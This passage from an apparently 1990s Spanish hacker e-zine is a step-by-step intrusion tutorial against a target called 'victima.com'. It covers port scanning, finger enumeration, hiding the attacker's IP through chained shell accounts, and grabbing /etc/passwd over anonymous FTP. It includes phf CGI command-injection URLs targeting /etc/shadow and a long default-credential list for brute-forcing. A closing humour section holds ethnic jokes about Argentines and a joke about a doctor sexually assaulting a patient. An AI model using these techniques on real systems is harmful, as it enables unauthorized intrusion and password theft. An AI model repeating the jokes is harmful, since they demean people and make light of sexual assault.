x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop 109/tcp postoffice
pop2 109/tcp # Post Office
pop3 110/tcp postoffice
portmap 111/tcp
portmap 111/udp
sunrpc 111/tcp
sunrpc 111/udp
auth 113/tcp authentication
sftp 115/tcp
path 117/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/udp ntpd ntp # network time protocol (exp)
nbname 137/udp
nbdatagram 138/udp
nbsession 139/tcp
NeWS 144/tcp news
sgmp 153/udp sgmp
tcprepo 158/tcp repository # PCMAIL
snmp 161/udp snmp
snmp-trap 162/udp snmp
print-srv 170/tcp # network PostScript
vmnet 175/tcp
load 315/udp
vmnet0 400/tcp
sytek 500/udp
biff 512/udp comsat
exec 512/tcp
login 513/tcp
who 513/udp whod
shell 514/tcp cmd # no passwords used
syslog 514/udp
printer 515/tcp spooler # line printer spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp # for LucasFilm
route 520/udp router routed
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
rvd-control 531/udp MIT disk
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # uucp daemon
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
garcon 600/tcp
maitrd 601/tcp
busboy 602/tcp
acctmaster 700/udp
acctslave 701/udp
acct 702/udp
acctlogin 703/udp
acctprinter 704/udp
elcsd 704/udp # errlog
acctinfo 705/udp
acctslave2 706/udp
acctdisk 707/udp
kerberos 750/tcp kdc # Kerberos authentication--tcp
kerberos 750/udp kdc # Kerberos authentication--udp
kerberos_master 751/tcp # Kerberos authentication
kerberos_master 751/udp # Kerberos authentication
passwd_server 752/udp # Kerberos passwd server
userreg_server 753/udp # Kerberos userreg server
krb_prop 754/tcp # Kerberos slave propagation
erlogin 888/tcp # Login and environment passing
kpop 1109/tcp # Pop with Kerberos
phone 1167/udp
ingreslock 1524/tcp
maze 1666/udp
nfs 2049/udp # sun nfs
knetd 2053/tcp # Kerberos de-multiplexor
eklogin 2105/tcp # Kerberos encrypted rlogin
rmt 5555/tcp rmtd
mtb 5556/tcp mtbd # mtb backup
man 9535/tcp # remote man server
w 9536/tcp
mantst 9537/tcp # remote man server, testing
bnews 10000/tcp
rscs0 10000/udp
queue 10001/tcp
rscs1 10001/udp
poker 10002/tcp
rscs2 10002/udp
gateway 10003/tcp
rscs3 10003/udp
remp 10004/tcp
rscs4 10004/udp
rscs5 10005/udp
rscs6 10006/udp
rscs7 10007/udp
rscs8 10008/udp
rscs9 10009/udp
rscsa 10010/udp
rscsb 10011/udp
qmaster 10012/tcp
qmaster 10012/udp

Se parece al archivo services de windows :-) .---

Ahora como scanear puertos .. , simple ... la forma primitiva es hacerle un telnet
a diferentes puertos .

ejmplos :

telnet victima.com 23 ----->> si te responde preguntandote un login
quiere decir que tiene el telnet abierto .

telnet victima.com 25 ----->> Si te responde algo como lo siguiente
220-Session protected by McAfee WebShield
220 Victima Sendmail SMI-8.x/SMI-SVR5 ready at Thu, 24 May 1998 17:52:01 -0400
tiene el STMP abierto .

telnet victima.com 79 ------>> Si queda en blanco un rato y no te bota
dale un enter y deberia salir algo como :
root pts/0 May 24 09:21 (xxx.xxx.xxx.xx)
root pts/1 May 24 12:30 (
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
)

esto significa que tiene el puerto de finger abiert .. el cual nos puede
proporcionar mucha informaci�n como el login ,, en este caso root .
ademas de algn correo en incluso la direccion ip como en el primer caso .

Abre una ventana dos y digita:

ftp vicitma.com
Connected to victima.com.
220 victima.com Microsoft FTP Service (Version 3.0).
User:

lo mismo que los otros este es le puerto 21 . de un server nt .

La segunda forma , mucho mas facil de hacer es con un portscan , hay
muchos en internet , de hecho el hackers utility trae uno , yo ocupo
el haktek , pero si eres novato en el tema seria mejor que probaras
por primera vez con el telnet para que conozcas el funcionamieto del
asunto . Si utilizas un portscan te daran los resultados de que puertos
tiene abiertos . Teniendo esa informaci�n sabremos por donde empezar ..
Bueno mi haktek me da los siguientes resultados.

port 21 found. Desc='ftp'
port 23 found. Desc='telnet'
port 25 found. Desc='smtp'
port 53 found. Desc='domain/names'
port 79 found. Desc='finger'
port 80 found. Desc='www'
port 106 found.
port 109 found.Desc='pop'
port 110 found. Desc='pop3'

EMPIEZA LA ACCION -----------------------------------------------------

Mmm interesante tiene el puerto 79 abierto cosa poco usual en estos dias
, vamos a ver quien esta conectado le haremos un finger , programa no
incluido en Guindoze pero lo podemos hacer haciendo un telnet al puerto 79
ahora si te bajaste el haktek desde nuestra web .. solo presiona los
binoculares que estan abajo , el ultimo icono y listo .

los resultados fueron los siguientes :

login name tty Idle When Where
root Gato Juanito p0 4:19 sat 14:41 xxx.xxx.xxx.x
root Epidemia p1 31 wed 14:16
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

Oki aki tenemos los primeros resultados , a sabemos un login ROOT
llevamos la mitad hecha ahora falta la password jejej . En otros
sistemas pueden haber mas usuarios se puede alargar bastante esta lista
y por la misma razon , entre mas usuarios conectados mas login tenemos
y mas posibilidades de encontrar algun usuario despistado que tenga
paswords faciles . Al tener el nombre de los usuarios no seria mala idea
probar con las abreviaciones de los nombres . ejemplo

entonces probemos pero tenemos que cuidarnos , ya saben ocultar nuestra ip
, si tienes cuentas shell en algun lado seria conveniente hacer lo siguiente
conectarnos con condon ... jejej en estos dias nadie sabe .

telnet condon1.com
Welcome to condon1.com

bla bla bla
>telnet condon2.com

Welcome to condon2.com

>telnet victima.com

ahora que estamos haciendo .. simple , la ip que quedara impresa en el
log de la victima sera la del condon2 entonces si el root quiere
averiguar quien intento entrar en su server le tendra que preguntar al
admin del condon2 , si el condon2 queda en japon va ser dificil que el
admin de la victima vaya a esos lares a preguntarle o no ??:-) , pero
si lo hiciera el admin del condon2 le daria la ip del condon1 , entienden
la idea .. jeje entrete ... ahora si no tienes cuentas shell anota ..
www.teldit.com desde este servidor puedes hacer telnet a travez del
navegador a travez de un applet java y utiliza la ip de ese server (nota.-
Si eres administrador de algun server o tienes cuenta shell y no quieres
que nadie se entere de tu password no uses el teledit , lo mas probable
es que este applet pueda ser modifcado de tal forma que guarde un log del
server al cual te conectas e incluso las claves , una gran base de datos
para los hackers ;-P )

hacemos telnet entonces y nos dice lo siguiente .

Welcome to Victima.com estamos esperando a que nos
hackees . como soy buen administrador y me encantan
los hackers les he dejado abierto el telnet
para que entren en mi sistema
happy hacking .

UNIX(r) System V Release 4.0

mmm bueno seguimos probando con lo que nos queda si tenemos suerte
(tendria que ser mucha) entraremos al sistema . A mi por lo menos
no me resulto asi que me fui al ftp a ver que encontraba ...
es simple normalmente todos los ftp usan el user anonymous como login
y password cualquiera , yo uso guest .. de hecho tu navegado cada vez
que te conectas a un sitio ftp o bajas algun software via ftp , registra
esta cuenta y usa como password tu e-mail , que malo , es por eso que
despues te llegan correos desde esos server ofreciendote servicios ya que
tu navegador les dices quien eres ,, pero bueno ese es otro cuento para
otro articulo .

abres una ventana dos y digitas ..

ftp victima.com
Connected to victima.com.
220-Session protected by McAfee WebShield
220 victima FTP server (UNIX(r) System V Release 4.0) ready.
User (xxxxxxxx:(none)): anonymous
530 User anonymous unknown.
Login failed.

shit .. tienen el anonymous desactivado ... no podre intrusear en su
ftp ... pero si tu entreaste con la cuenta anonymous haz lo siguiente .

230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bin
usr
etc
pub
dev
226 Transfer complete.
44 bytes received in 0.00 seconds (44000.00 Kbytes/sec)
ftp> cd etc
250 CWD command successful.
ftp> ls -a
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
group
netconfig
passwd
passwd.bak
226 Transfer complete.
45 bytes received in 0.00 seconds (45000.00 Kbytes/sec)
ftp> get
(remote-file) passwd
(local-file) c:\tudirectorio\passwd
200 PORT command successful.
150 Opening ASCII mode data connection for passwd (222 bytes).
226 Transfer complete.
227 bytes received in 0.00 seconds (227000.00 Kbytes/sec)
ftp>by

Ahora si no pudiste ver el archivo passwd o shadow , o no te dejo conectarte
prueba este viejo bug a ver si resulta .

ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.

Una vez adentro bajas el archivo passwd o shadow .... este es un bug muy viejo
de hecho personalmente jamas me he encontrado con alg�n server que me lo permita ...
paro quien sabe .. ???

JUGANDO CON EL PHF .---------------------------------------------------

El phf , si se que esta mas que visto , que es super antiguo pero
aunque ustedes no lo crean funciona . Solo podemos probarlo en sistemas
que corran bajo unix y que tengan el cgi-bin activo ..

El phf es un fichero que funciona como uan especie de busqueda de datos
pero que podemos utilizar facilmente para ejecutar programas , ver archivos
etc ...

partamos por lo basico veamos que sucede ....

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
( 1 )( 2 )( 3 )( 4 )( 5 )( 6 )

1.- El site que quieras atacar.
2.- El comando phf.
3.- Aqui es donde esta el secreto.
4.- El programa que quieres que se ejecute en este caso cat (como un edit).
5.- El %20 es un espacio, y se pueden usar tantos como te hagan falta.
6.- Y pues aqui va el archivo o directorio que quieres ver.

Con este comando deberiamos estar editando el fichero passwd
el resultado que aparecera en nuestro navegador fue el siguiente .

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd

Mierda no funciona , al intentar con shadow en vez de passwd tampoco me da
resultado ... pero algo interesante sucede .. hizo el query .
veamos que hay en el etc .

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/etc

fijense que esta vez cambie el comando cat por ls , que es como el dir en unix
direccionado al subdir etc . veamos que sucede .

Query Results

/usr/local/bin/ph -m alias=x /bin/ls /etc

TIMEZONE
a
acct
passwd
shadow
hosts
mail
net
sercurity -------->>>>jajajaja insecurity .---
..
..
..
muchos ficheros mas .

Esto se pone demasiado interesante , pero ahora debo averiguar el por que no
pude editar el shadow .. que ya sabemos que es ese el fichero que debo tomar
por que lo vimos en el directorio .

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/hosts

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/hosts

#
# Sun Host Database
#
# If the NIS is running, this file is only consulted when booting
#
127.0.0.1 localhost
#
xxx.xx.xxx.xx algunweb.com
xxx.xx.xxx.xx algunweb.com
xxx.xx.xxx.xx algunweb.com
xxx.xx.xxx.xx algunweb.com

MMMmmmmm pudmos editar el hosts , eso quiere decir que le comando cat
esta perfecto , que puede haber un problema de permisos , talvez solo
el root puede editar estos archivos , averiguemoslo ...

http://www.vicitma.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/etc/shadow

Aqui le hacemos un ls -l al fichero shadow el -l nos mostrara
los permisos del archivo ..

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l /etc/shadow

-r-------- 1 0 sys 27348 May 20 15:38 /etc/shadow

AHora se que es un archivo pero me dice por la r que es un archivo de
lectura que solo lo puede leer el propietaro de este archivo , en este caso
el sys o sea el systema . Ahora voy a a tratar de explicar la forma con la
cual saque esta conclusi�n ...

aki va un ejemplo ...

-rwx--xr-x 1 0 sys 27348 May 20 15:38 /etc/shadow

si te fijas en la figura te daras cuenta que hay una linea de 10 espacios
"-rwx--xr-x" la caual el primer caracter nos indica que es , directorio , archivo..
etc.. ver caudro 1 .-

cuadro 1 .-
************************************************************************
El primer '-' significa que es un archivo normal, ya que si fuese un
directorio dicho '-' nos lo representaria por 'd', si fuese un enlace
mediante 'l', 'b' significaria que es un dispositivo especial de bloques,
'c' un dispositivo especial de caracteres,'p' un archivo de conduccion por
nombre, 's' un semaforo y 'm' nos indicaria que es un archivo de memoria
compartida.
*************************************************************************
Este cuadro de texto es gentileza de JJF/Hackers Team

Los siguientes tres caracteres "rwx" nos indican los permisos del propietario
del archivo en este caso el systema o SYS , cuyos permisos son r "lectura"
w "escritura" x "ejecuci�n" .
Los caracteres siguientes "--X" son los derechos que tiene el grupo al cual
pertence el propietario en este caso x "ejecuci�n".
Y los ultimos 3 caracteres indican los derechos del resto de los usuarios
"r-x" que en este caso son de lectura y ejecuci�n .Se entiende ? espero
que si ... vamos entonces a tratar de cambiar los derechos de este archivo .

************************************************************************
La principal caracteristica que tiene esta nomenclatura es la de
asignar los permisos mediante valores octales.
Como todos sabreis, la base octal, o base 8, puede contener de los
numeros 0 al 7. Es por ello, que tan solo son validos estos numeros a la
hora de asignar permisos. Fijate en el siguiente cuadro:

Fig 1. Permiso Valor_Octal
------------------------------
r | lectura 4
w | escritura 2
x | ejecucion 1

Claramente observamos que numero octal corresponde a cada
caracteristica de un archivo o directorio en un sistema UNIX. Pasemos pues
a poner en uso todo lo aprendido hasta ahora.
Como dijimos antes el comando utilizado por los S.O UNIX para
establecer permisos recibe el nombre de chmod. A la hora de dar permisos en
forma absoluta hemos de seguir la siguiente Sintaxis: 'chmod XYZ archivo'.
X representa al due�o del archivo, Y al grupo y Z al resto de
usuarios, mientras que 'archivo' es el nombre del archivo a especificar los
permisos. Siempre que queramos atribuir mas de un permiso los numeros
octales se sumaran

************************************************************************
Este cuadro de texto es gentileza de JJF/Hackers Team

Es decir que si queremos darle permiso de lectura escritura y ejecuci�n al
archivo sahdow el comando a ejecutar seria el siguiente :

chmod 407 shadow

Con este comando no el archivo quedara con los siguientes atributos .

-r-----rwx 1 0 sys 27348 May 20 15:38 /etc/shadow

Lo cual nos indica que el propietario del archivo tiene acceso solo a la
lectura del archivo , el grupo querda sin ningun derecho sobre el archivo
mientras el resto de los usuarios pueden leerlo , escribirlo y ejecutarlo .

Veamos la parte practica , aunque lo veo dificil ya que habiamos visto que
el archivo solo lo pod�a leer el systema , cosa que solamente el root pod�a
variar , es decir el comando chmod solo tendria efecto en este archivo si fuese
el Root el que lo ejecutara , pero sigamos probando quien sabe ??

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/chmod%20407%20/etc/shadow

Query Results

/usr/local/bin/ph -m alias=x /bin/chmod 407 /etc/shadow

Veamos que sucedi� ............:-)

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/etc/shadow

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l /etc/shadow

-r-------- 1 0 sys 27348 May 20 15:38 /etc/shadow

Nada , bueno me lo imaginaba .... que lata ...

Probemos la siguiente t�cnica , trataremos de copiar el archivo a otro
a ver que pasa .

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cp%20/etc/shadow%20/etc/pass.txt

Query Results

/usr/local/bin/ph -m alias=x /bin/cp /etc/shadow /etc/pass.txt

Bueno aki lo que tratamos de hacer es copiar el shadow a un archivo llamado pass.txt
veremos que pasa .

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/etc/pass.txt

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l /etc/pass.txt

Fuck , no fue posible no pudimos copiarlo .. que lata ..

Bueno que importa .. trataremos de buscar otros metodos , pero aprovechando esta falla
podemos ver los directorios , los archivos etc.. , las posibilidades son infinitas .

Bueno busquemos otra tecnica de entrar al sistema ..

FUERZA BRUTA ***********************************************************************

Esta t�cnica es mas que basica pero funciona , se trata de utilizar las cuentas default
que trAen los sitemas , es decir ; Normalmente los sistemas traen cuentas que vienen por
defecto , como el usr_template o guest en novell , o el guest de windows NT . .
Aki va un listado de cuentas default de diferentes sistemas .

Cuentas por defecto
-------------------

AIX
~~~
guest guest

AS/400
~~~~~~
qsecofr qsecofr
qsysopr qsysopr
qpgmr qpgmr
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qsvr qsvr
secofr secofr

DECserver
~~~~~~~~~
ACCESS
SYSTEM

HP-x000
~~~~~~~
Este sistema es elaborado por Hewlett-Packard. Se caracteriza por el prompt
":". La secuencia de entrada a este sistema es una de las m s complicadas.
Debes escribir: "HELLO SESSION NOMBRE,USUARIO,NOMBRE-DE-CUENTA,GRUPO"
Afortunadamente algunos de esos campos pueden dejarse en blanco. En ocasiones
todos los campos est n protegidos con passwords por lo que este sistema no es
uno de los m s faciles de acceder.

Las cuentas defaults comunes son:

Login User
~~~~~ ~~~~
MGR.TELESUP,PUB MGR
Acct: HPONLYG rp: PUB
MGR.HPOFFICE,PUB
FIELD.SUPPORT,PUB FLD,
MAIL.TELESUP,PUB MAIL,
MGR.RJE
FIELD.HPP189 ,HPP187,HPP189,HPP196
MGR.TELESUP,PUB,HPONLY,HP3

Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
HELLO OP.OPERATOR
MGR CAROLIAN
MGR CCC
MGR CNAS
MGR CONV
MGR COGNOS
OPERATOR COGNOS
MANAGER COGNOS
OPERATOR DISC
MGR HPDESK
MGR HPWORD
FIELD HPWORD
MGR HPOFFICE
SPOOLMAN HPOFFICE
ADVMAIL HPOFFICE
MAIL HPOFFICE
WP HPOFFICE
MANAGER HPOFFICE
MGR HPONLY
FIELD HPP187
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MANAGER ITF3000
MAIL MAIL
MGR NETBASE
MGR REGO
MGR RJE
MGR ROBELLE
MANAGER SECURITY
MGR SECURITY
FIELD SERVICE
MANAGER SYS
MGR SYS
PCUSER SYS
RSBCMON SYS
OPERATOR SYS
OPERATOR SYSTEM
FIELD SUPPORT
OPERATOR SUPPORT
MANAGER TCH
MAIL TELESUP
MANAGER TELESUP
MGR TELESUP
SYS TELESUP
MGE VESOFT
MGE VESOFT
MGR WORD
MGR XLSERVER

Major BBS
~~~~~~~~~
Sysop Sysop

PICK O/S
~~~~~~~~
DSA
DS
DESQUETOP
PHANTOM

Prolog
~~~~~~
PBX PBX
NETWORK NETWORK
NETOP

Rolm
~~~~
CBX Defaults

op op
op operator
su super
admin pwp
eng engineer

PhoneMail Defaults
~~~~~~~~~~~~~~~~~~
sysadmin sysadmin
tech tech
poll tech

RSX
~~~
SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)
1,1/system (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER
MICRO/RSX

System 75
~~~~~~~~~
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field

Taco Bell
~~~~~~~~~
rgm rollout
tacobell

Verifone Junior 2.05
~~~~~~~~~~~~~~~~~~~~
Default password: 166816

VMS
~~~
La computadora VAX es creada por Digital Equipment Corporation (DEC) y corre
el sistema operativo VMS (virtual memory system). VMS se caracteriza por su
prompt 'Username:'. Este sistema no te dir si has entrado un login correcto
o no y te desconectar despu�s de tres malos intentos. Tambi�n mantiene un
record de todos los logins que fallaron e informa al due�o de la cuenta la
pr�xima vez que entre cuantos intentos fallados se hicieron. Es uno de los
sistemas m s seguros desde fuera pero ya dentro tiene varios errores en la
seguridad. Las VAX ademas tienen uno de los mejores archivos de ayuda de
entre los dem s sistemas, para acceder a esta ayuda s�lo escribe HELP en el
prompt.

Las cuentas defaults comunes son: [ usuario: password [,password] ]

Login Password
~~~~~ ~~~~~~~~
decnet decnet
demo
demo demo
field field
field service
guest
guest guest
operator operator
sysmaint digital
sysmaint service
sysmaint sysmaint
system manager
system operator
system syslib
system system
systest uetp

UNIX
~~~~
Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
adm adm
adm admin
admin adm
admin admin
bin bin
daemon daemon
decnet ddennet
decnet nonpriv
default user
demo demo
field digital
field service
field test
games games
games player
guest friend
guest guest
guest welcome
host host
learn learn
netnonpriv nonpriv
nuucp nuucp
postmaster mail
rje rje
root root
root sysop
root system
sys sys
sys system
sysop sysop
sysman sys
sysman sysman
sysman system
sysadmin adm
sysadmin admin
sysadmin sys
sysadmin sysadmin
sysadmin system
sysbin sysbin
sysmaint digital
sysmaint service
system manager
system operator
system syslib
system uetp
systest_clig systest
test test
tty tty
unix test
unix unix
userp user
uucp uucp
uuhost uuhost
who who

PRIME
~~~~~
Esta computadora opera con el sistema operativo Primos. Son f ciles de detec-
tar ya que reciben a uno con el mensaje "Primecon xx.xx.xx" o algo parecido
dependiendo de la versi�n que te encuentres. Usualmente no ofrecen ning�n
prompt as� que debes escribir "login ". Si la versi�n es anterior a
la 18.00.00 puedes presionar un mont�n de caracteres de escape o CTRL-C y en-
trar s. Este sistema ofrece la capacidad de conectarte a los NUAS de todo el
mundo con el comando NETLINK...sintax: nc

Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
guest guest
guest prime
guest1 guest
netlink netlink
prime prime
prime primos
primos prime
primos primos
primos_cs prime
primos_cs primos
primenet primenet
system prime
system primos
system system
test test
test prime
test primos

DEC-10
~~~~~~
Este es el equipo de c�mputo m s nuevo que existe dentro de la linea de DEC's.
Operan el sistema operativo TOPS-10. Este tipo de m quinas se reconocen por el
prompt "." Las series DEC-10/20 son amables con los hackers permitiendo varios
intentos en el login prompt sin guardar un log de los intentos fallados. Las
cuentas est n en forma [xxx,yyy]. Lo mejor de este sistema es la posibilidad
de obtener informaci�n sobre las personas en l�nea antes de entrar a �l usando
el comando systat. Si ves una cuenta que lea [234,1001] BOB JONES, ser�a
inteligente probar como password BOB, JONES, BOBBY, etc. Para entrar al sis-
tema se usa el comando: login xxx,yyy [enter] password:

Este sistema como antes hab�a dicho, permite intentos sin limite y adem s te
avisa si el login que est s usando existe.

Las cuentas defaults comunes son:

IRIS
~~~~
Iris significa (interactive real time information system). Originalmente
corr�a en PDP-11's, pero ahora corre en otras minis. Para identificar uno de
estos sistemas busca el texto "Welcome to `IRIS' R9.1.4 Timesharing" y el
prompt ACCOUNT ID? (algunas veces es cambiado). IRIS no tiene limites a la
hora de hackear una cuenta y no guarda un log de los intentos fallados.

VM/CMS
~~~~~~
Este sistema es ejecutado en las super computadoras de IBM (International
Business Machines) llamadas mainframes. Una vez conectado a una de estas
computadoras te mostrar un mensaje asi "VM/370 ONLINE", y te dar un prompt
"." justo como la TOPS-10 lo hace. Para entrar debes ejecutar: LOGON

Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
autolog1 autolog
autolog1 autolog1
cms cms
cmsbatch cms
cmsbatch cmsbatch
erep erep
maint maint
maint maintain
operatns operatns
operatns operator
operator operator
rscs rscs
smart smart
sna sna
vmtest vmtest
vmutil vmutil
vtam vtam

NOS
~~~
NOS significa Networking Operating System y corre en la Cyber computadora
hecha por Control Data Corp. A este sistema lo puedes identificar f cilmente
por la bienvenida "WELCOME TO THE NOS SOFTWARE SYSTEM...". El primer prompt
que recibir s sera FAMILY: (presiona enter) depu�s llegar s a otro prompt
USER NAME: donde cada uno es de 7 digitos alfanumericos y son dependientes
del sistema por lo que no son palabras o frases conocidas.

DECSERVER
~~~~~~~~~
Las DECs son una serie de computadoras conectadas entre s� para formar una
s�la unidad de procesamiento, la funcionalidad de estos sistemas es altamente
utilizado por los hackers para quebrar passwords de cuentas unix por la
rapidez del sistema. El prompt usualmente sera: "Enter Username>" aunque yo
he visto otros prompts en estos sistemas. El nombre de usuario puede ser
cualquier cosa, lo mejor ser presionar algo nada sospechoso como `c' o alg�n
n�mero. De ah� te presentar con el prompt `local>'. De ah� debes ejecutar
`c ' para conectarte. Para obtener una lista de sistemas conectados
ejecuta `sh' `services' o `sh nodes'. En algunos sistemas DEC'S existen
comandos como MODEM o DIAL que permiten hacer uso de un m�dem para llamadas
externas que te permitir n marcar a BBS internacionales a expensas de la
compa��a que opera el DEC.

******** Listado extraido del Web de RAREGAZZ ****************************

Bueno nos conectamos a la victima con condon o en ultima instancia a travez del teledit
, despues de tratar con varias cuentas llegue a lo siguiente :-p .

UNIX(r) Sytem Release 4.0

Bingo entre en el sistema ... pero a los segundos me desconecta . No me da acceso por la
direcci�n ip , pero es algo simple de solucionar vamos a hacer ipspoff (falsear ip) para
entrar , pero lo dejaremos para el segundo capitulo de esta saga hasta la proxima .

Estamos abiertos a caulquier sugerencia
************************************************************************

SI QUIERES MAS INFORMACI�N SOBRE LOS DERECHOS DE ARCHIVOS EN UNIX , LEE
EL ARTICULO ESCRITO POR KOJI EN JJF/HACKERS TEAM NUMERO 3 , PERO YO TE
RECOMIENDO QUE TE LAS LEAS TODAS :-) .

JJF/HACKERS TEAM http://www.angelfire.com/mi/JJFHackersTeam/

O BUSCA EL ENLAZE NE NUESTRA WEB.

*******************************
* 6.- Chistes historias *
* Cuentos varios *
*******************************

_____________________________________________________________ Varios

Bueno esta secci�n esta dise�ada para enfriar un rato la testa , asi
que relanjese y a resirse un rato , si quieres colaborar en esta secci�n
nuestro correo es
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

EL PERRO CAZADOR DE MONOS *********************************************

Hab�a un tipo que quer�a recolectar monos para un circo.
Le indican que en �frica hab�a un tipo que agarraba monos
vivos.

Llega al �frica el comerciante y contacta al tipo que
agarraba los monos vivos. El d�a de buscar los monos el
recolector de monos le dice que hay que llevar un perro
mast�n cazador y una escopeta. El tipo le dice que el perro
si pero la escopeta no, que �l quiere los monos vivos. No se
preocupe que la escopeta es muy importante, en eso se
consiguen un mono montado en una mata y el tipo mueve la
mata y cae el monito y el perro al caer le hace el amor. El
monito queda todo atolondrado y lo meten en un saco.

As� ocurre con muchos monitos. Al caer, el perro le hacia el
amor.

Llegan y consiguen un mono grandote montado en una mata y el
tipo mueve la mata y el mono no cae.

Le dice el tipo al comerciante me voy a montar en la mata
pero si me caigo primero que el mono. Agarras la escopeta y
matas al perro.

CHISTES DE ARGENTINOS ***********************************************

�Que nace de un pap� argentino y una mam� empleada de servicio?
Un portero que se cree due�o del edificio.

--------------------
�En que se diferencias los argentinos a las pilas?
En que las pilas tiene un lado positivo.

--------------------
�Como ladra un perro argentino?
Esteeeeee, guau!

--------------------
�Sabes qu� es el ego?
Es el peque�o argentino que todos llevamos por dentro.

--------------------
�Conoces el mejor negocio del mundo?
Comprar un argentino en lo que vale y venderlo en lo que
dice valer.

--------------------
Un argentino le dice a otro:
Fij�te ch�, c�mo es cierto que Dios es muy humilde, seg�n
dice las Escrituras. Mir� que naci� en Bel�n pudiendo haberlo
hecho en Buenos Aires.

--------------------
- Pap�, Pap�, cuando yo sea grande quiero ser como vos.
�Y para qu� hijo?
- Pues para tener un hijo como yo !!!

--------------------
Hab�a un argentino tan, pero tan presumido, que para su
cumplea�os, le mandaba tarjetas de felicitaciones a sus padres
por haberlo tenido a el.

--------------------
Cuando los argentinos tienen complejo de inferioridad, es que se
sienten como el resto de los mortales.

--------------------
Una frase muy celebre, se la atribuyen a un pintoresco
presidente de Argentina. La frase es la siguiente
- En Argentina sufren s�lo 6 personas -
Yo, t�, �l, nosotros, vosotros, ellos.

--------------------
Dos argentinos se encuentran.
Despu�s de los saludos habituales uno pregunta:
- �c�mo van tus cosas?
- Muy bien, pero muy bien ch�, �o quer�s que te cuente la
verdad?

--------------------
Es verdad que Dios es argentino?
No, todos saben que naci� en Bel�n...
Pero eso s�, tiene su oficina en Buenos Aires.

--------------------
Sabes como se suicida un argentino?
Saltando del proprio ego.

---------------------
Por que en Argentina hay tantos casos de sietemesinos?
Porque ni su madre los aguanta nueve meses.

---------------------
- Esto... porque nosotros los argentinos somos los mejores.
- Pues perdisteis en la guerra de las Malvinas.
-Che! Esto... no, no perdimos, quedamos subcampeones.

---------------------
�Por que es el tango la m�sica favorita de los latinos?
Porque en cada tango muere un argentino.

--------------------
En que se parecen un medico y un abogado argentinos?
En que los dos son taxistas

--------------------
Por que los argentinos miran al cielo cada vez que hay un
rel�mpago?
Porque creen que Dios les esta tomando una foto.

--------------------
Llegan dos argentinos a una fiesta y uno le pregunta al otro:
- Ch�, �les decimos que somos argentinos?
- No, que se jodan.

EL MUDO APRENDE A HABLAR ********************************************

Llega un mudo al medico y le escribe en un papel al doctor.

- Doctor vengo para que me ense�e a hablar, quiero dejar de
ser mudo.

-Perfecto, venga ma�ana a mi casa y le ense�are a hablar.

Al otro d�a el mudo esta puntual, entra y el medico le dice

- Bien, ahora haga todo lo que le digo. Qu�tese toda la
ropa.

El mudo pone cara de bravo y escribe.

- Para que tengo que quitarme la ropa si lo que quiero es
aprender a hablar.

- Si quiere hablar tiene que quitarse la ropa.

El mudo se queda desnudo

- Ahora p�ngase en cuatro patas.

- En cuatro patas!!?? Yo lo que quiero es hablar

- Le dije que debe hacer todo lo que le diga. En cuatro
patas.

El mudo se pone en cuatro, el doctor le mete la picha por el
culo y el mudo grita.

-AAAAAAAAAAAAAAAAAA!!!!!

y dice el medico

- Perfecto, venga ma�ana para que aprenda la E.

DIFERENTES TIPOS DE CURICULUM .*************************************

1.- MODESTO
Yo nac� en el seno de una familia pobre y sufr� penurias
para acabar la carrera. Por eso le suplico que me contrate.

2.- CHULESCO
He terminado la carrera, ahora soy Dios. Por ello, le
concedo la posibilidad de entrevistarse conmigo, pero que no
sirva de precedente. Yo dir� cuanto quiero cobrar y el color
del Ferrari.

3.- HIPPIE
El bienestar y la paz mundial han aumentado con la
finalizaci�n de mis estudios. Como puede comprobar, mi
